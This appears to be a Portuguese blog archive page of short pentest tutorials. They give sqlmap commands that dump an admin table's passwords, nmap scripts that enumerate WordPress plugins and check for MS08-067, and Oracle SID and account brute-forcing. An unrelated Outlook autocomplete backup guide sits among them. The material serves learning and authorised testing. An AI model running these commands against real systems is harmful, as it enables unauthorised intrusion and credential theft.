Anúncios

Arquivo

Archive for the ‘Infra’ Category

Tutorial: SQL Injection para quem está iniciando


Olá a todos mais uma vez

Segue agora uma dica excelente para Pentest, esse breve tutorial vai mostrar uns passos básicos para explorar a vulnerabilidade de SQL Injection em alguns sites.

Lembre-se que o uso incorreto dessa técnica é crime, e o meu objetivo de mostrar essas informações aqui é apenas para aprendizado e testes em ambientes controlados e ou clientes.

Abra um terminal no backtrack e vamos usar a ferramenta SQLMAP

cd /pentest/database/sqlmap

Vamos executar o sqlmap

OBS: Os parametros dbs, dump, tables, columns devem ser precedidos de — (dois traços)

./sqlmap.py -u http://www.exemplo.com/viewfaculty.php?id=12 dbs (vc precisa ter um alvo vulnerável para conseguir, para saber se o alvo é vulnerável, basta por uma ‘  no final da url e dar “enter” se retornar algum erro de banco de dados o alvo é vulnerável)

O campo “current database” vai mostrar o nome do BD vulnerável, daí basta usarmos as opções para explorarmos. Podemos listar todas as tabelas.

./sqlmap.py -u http://www.exemplo.com/viewfaculty.php?id=12 -D NOMEDOBD tables

Devemos trocar NOMEDOBD pelo valor obtido em “current database”

O Resultado vai ser algo parecido com isso:

Screenshot-4

Daí podemos escolher uma tabela e listar as colunas

./sqlmap.py -u http://www.exemplo.com/viewfaculty.php?id=12 -D NOMEDOBD -T admin columns

O resultado será parecido a esse:

Screenshot-6

Podemos escolher quais colunas queremos extrair informações

./sqlmap.py -u http://www.exemplo.com/viewfaculty.php?id=12 -D NOMEDOBD -T admin -C id,passwrd,u_name dump

Entendendo as técnicas é possível extrair todos os dados que desejar do Banco vulnerável

Espero que tenham gostado

Por favor compartilhem

Anúncios

Tutorial: Como fazer backup e restore da lista de Autocompletar do Outlook 2010


Como exportar o cache de AutoCompletar

Para exportar o cache de AutoCompletar, siga estas etapas:

  1. Saia do Outlook e, em seguida, feche o Outlook Web Access ou o Outlook Web App (OWA) em todas as estações de trabalho que estão conectados à caixa de correio do usuário.
  2. Use MFCMAPI para importar a lista AutoCompletar. Para fazer isso, siga estes passos:
    1. Baixe o MFCMAPI de http://mfcmapi.codeplex.com.
    2. Execute mfcmapi.exe.
    3. No menu de session , clique em Logon.
    4. Se você for solicitado para um perfil, selecione o nome do perfil desejado e, em seguida, clique em OK.
    5. No painel superior, localize a linha que corresponde à sua caixa de correio e, em seguida, clique duas vezes nele.
    6. No painel de navegação do lado esquerdo, expanda Root Container e Início do armazenamento de informações ou IPM Sub Tree.
    7. Com o botão direito na pasta caixa de entrada e, em seguida, clique em Open Associated Content Table.Essa ação abre uma nova janela MFCMAPI que contém várias propriedades.
    8. Na coluna Subject , com o botão direito no item que tem o assunto IPM.Configuration.Autocomplete e clique em Exportar. Essa ação abre a janela Salvar em arquivo de mensagem .
    9. Na lista drop-down, selecione o arquivo MSG (UNICODE)e, em seguida, clique em OK.
    10. Selecione um local de pasta para o qual você deseja salvar a mensagem e, em seguida, clique em Salvar. Anote este local.

Como importar o cache de AutoCompletar

Para importar o cache de AutoCompletar exportado usando as etapas na seção “Como exportar o cache de AutoCompletar”, siga estas etapas:

  1. Saia do Outlook e, em seguida, feche o Outlook Web Access ou o Outlook Web App (OWA) em todas as estações de trabalho que estão conectados à caixa de correio do usuário.
  2. Use MFCMAPI para importar a lista AutoCompletar. Para fazer isso, siga estes passos:
    1. Execute mfcmapi.exe.
    2. No menu de session , clique em Logon.
    3. Se você for solicitado para um perfil, selecione o nome do perfil desejado e, em seguida, clique em OK.
    4. No painel superior, localize a linha que corresponde à sua caixa de correio e, em seguida, clique duas vezes nele.
    5. No painel de navegação do lado esquerdo, expanda Root Container e Início do armazenamento de informações ou IPM Sub Tree.
    6. Com o botão direito na pasta caixa de entrada e, em seguida, clique em Open Associated Content Table.Essa ação abre uma nova janela MFCMAPI que contém várias propriedades.
    7. Para evitar entradas duplicadas, você deve excluir a mensagem de conclusão automática existente.

      Observação Antes de excluir o IPM.Configuration.Autocomplete mensagem, você deve exportar a mensagem usando as etapas na seção “Como exportar o cache de AutoCompletar”.

      Para excluir a mensagem de preenchimento automático existente, siga estas etapas:

      1. Na coluna Subject , localize o item que tem o assunto IPM.Configuration.Autocomplete.
      2. Clique com o botão direito e, em seguida, clique em Excluir a mensagem. Isso abre a janela Excluir Item.
      3. Na lista drop-down, selecione a exclusão permanente (exclui excluído a retenção de item, se houver suporte) e, em seguida, clique em OK .
    8. No menu de Folder , clique em Import e, em seguida, clique em De MSG.
    9. Localize o arquivo. msg que você criou anteriormente na seção “Como para exportar a lista de preenchimento automático” e, em seguida, clique em OK.
    10. Na janela Mensagem de carga que aparece, selecione carregar a mensagem na pasta atual na lista estilo da carga e, em seguida, clique em OK.

Fonte: support.microsoft.com

Tutorial: Usando nmap para listar plugins do WordPress


Bem vindos novamente

Dessa vez vou mostrar como usar a poderosa ferramenta do nmap para listar plugins instalados em uma instalação do wordpress

"nmap --script=http-wordpress-plugins --script-args
 http-wordpress-plugins.root="/blog/",
http-wordpress-plugins.search=500 <targets>"

O Resultado será uma lista com os plugins que foram localizados na instalação do wordpress.

Se gostou da dica, por favor compartilhe!

Até a próxima

Tutorial: Usando o nmap para verificação de vulnerabilidades


Olá a todos mais uma vez

Desta vez gostaria de mostrar pra vocês como usar o nmap para checar a existência da vulnerabilidade MS08-067, para quem não conhece essa vulnerabilidade pode ser explorada pelo Worm Conficker. Algumas ferramentas como Metasploit também podem ser usadas para explorar essa vulnerabilidade, basta usar o seguinte comando:

nmap --script smb-check-vulns.nse -p445 <host> (No de um host alvo apenas)

"nmap -PN -T4 -p139,445 -n -v --script=smb-check-vulns --script-args
safe=1 [target networks] (No caso de escanear todo um segmento de rede)"

A resposta será algo parecido com isso informando se o alvo é vulnerável ou não

Host script results:
| smb-check-vulns:  
|   MS08-067: NOT VULNERABLE
|   Conficker: Likely CLEAN
|   regsvc DoS: regsvc DoS: NOT VULNERABLE
|   SMBv2 DoS (CVE-2009-3103): NOT VULNERABLE
|   MS06-025: NO SERVICE (the Ras RPC service is inactive)
|_  MS07-029: NO SERVICE (the Dns Server RPC service is inactive)

Caso vc encontre uma máquina vulnerável vc pode explorer essa falha usando essa dica aqui

http://hernaneac.net/2012/11/28/explorando-vulnerabilidades-usando-metasploit-framework/ 


								

Dica para pentest: Descobrindo contas de usuário no Oracle com o Nmap


Olá a todos mais uma vez

Gostaria de passar hoje uma dica para quem for executar um pentest, ou apenas para aprendizado mesmo.

Com essa dica é possível obter informações como SID de um BD Oracle e também fazer o levantamento de contas de usuário disponíveis usando apenas o nmap.

basta fazer o seguinte:

Execute o comando: nmap –script oracle-sid-brute 192.168.0.12

O resultado será algo semelhante ao abaixo onde no nosso caso o SID é o ORCL

ScreenHunter_06 Mar. 11 13.22

 

Feito isso basta executar o próximo comando: nmap –script oracle-brute -p 1521 –script-args oracle-brute.sid=ORCL 192.168.0.12

ScreenHunter_06 Mar. 11 13.27

 

Com isso obtemos uma lista de contas disponíveis no servidor de banco de dados oracle.

Espero que tenham gostado da dica e não se esqueça de compartilhar

Abraços

%d blogueiros gostam disto: